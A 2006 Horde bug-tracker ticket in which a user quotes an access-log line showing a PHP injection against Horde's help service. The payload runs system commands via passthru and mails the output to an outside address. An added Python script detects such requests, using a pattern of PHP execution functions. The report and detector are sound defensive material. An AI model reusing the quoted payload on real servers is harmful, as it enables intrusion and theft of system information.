[Tickets #4141] NEW: Possible exploit?
bugs@bugs.horde.org
Sun Jul 9 22:25:02 PDT 2006
DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.
Ticket URL: http://bugs.horde.org/ticket/?id=4141
-----------------------------------------------------------------------
Ticket | 4141
Created By | john at hertell.nu
Summary | Possible exploit?
Queue | Horde.org Servers
State | Unconfirmed
Priority | 1. Low
Type | Bug
Owners |
-----------------------------------------------------------------------
john at hertell.nu (2006-07-09 22:25) wrote:
I do not know where to post this, but my site has acted strangely
sometimes, and I have a fully patched Mandriva 2006.0 system, so I hope
that my Horde is also 100% up to date (if they sent out the updates for
Horde in the updates; I update my system often).
Anyway..
I have found several lines like this in my log:
222.122.6.124 - - [09/Jul/2006:10:09:10 +0200] "GET
//horde//services/help/?show=about&module=;%22.passthru(%22w%20%3E%3E%20out;uname%20-a%20%3E%3E%20out;%22.chr(47).%22sbin%22.chr(47).%22ifconfig%20%7C%20grep%20inet%20%3E%3E%20out;cat%20out%20%7Cmail%20-s%20hacked%20lilkim at undernet.ro%22);'.
HTTP/1.1" 200 1158
And Perl takes a LOT of CPU.. guess this is able to get a script and run
it..
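
A detection check for requests shaped like the one quoted in the report above, added here as an example; it is not part of the original ticket or of Horde's code. It assumes Apache common log format and that a legitimate `module` value is a short plain identifier; `scan_line`, `scan` and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Apache common log format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (.*) HTTP/[\d.]+" (\d{3}) \S+$')
# PHP calls that run OS commands or assemble characters to slip past filters.
PHP_CALL_RE = re.compile(r'\b(passthru|system|shell_exec|exec|popen|proc_open|eval|chr)\s*\(', re.I)
# Assumption: a legitimate module name is a short plain identifier.
PLAIN_NAME_RE = re.compile(r'^[A-Za-z0-9_-]{0,64}$')

def scan_line(line):
    """Return a finding dict for a suspicious help request, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    host, when, method, target, status = m.groups()
    # Split by hand: a target starting with "//" confuses URL parsers,
    # which read the first path segment as a hostname.
    path, _, query = target.partition('?')
    if 'services/help' not in re.sub(r'/+', '/', path):
        return None
    for pair in query.split('&'):
        name, _, raw = pair.partition('=')
        if name != 'module':
            continue
        value = unquote_plus(raw)  # decode %22, %20, ... before matching
        calls = sorted({c.lower() for c in PHP_CALL_RE.findall(value)})
        if calls or not PLAIN_NAME_RE.match(value):
            return {'host': host, 'time': when, 'status': int(status),
                    'php_calls': calls, 'decoded': value}
    return None

def scan(lines):
    """Scan an iterable of log lines and return all findings."""
    return [f for f in map(scan_line, lines) if f]

# Constructed sample lines (documentation IP range), not taken from a real log.
SAMPLE = [
    '192.0.2.10 - - [09/Jul/2006:10:09:10 +0200] "GET /horde/services/help/?show=about&module=imp HTTP/1.1" 200 1158',
    '192.0.2.77 - - [09/Jul/2006:10:09:11 +0200] "GET //horde//services/help/?show=about&module=;%22.passthru(%22w%22.chr(47));\'. HTTP/1.1" 200 1158',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE):
        print(finding)
```

A 200 status in a finding only shows that the server returned a page; it does not by itself show whether the injected code ran.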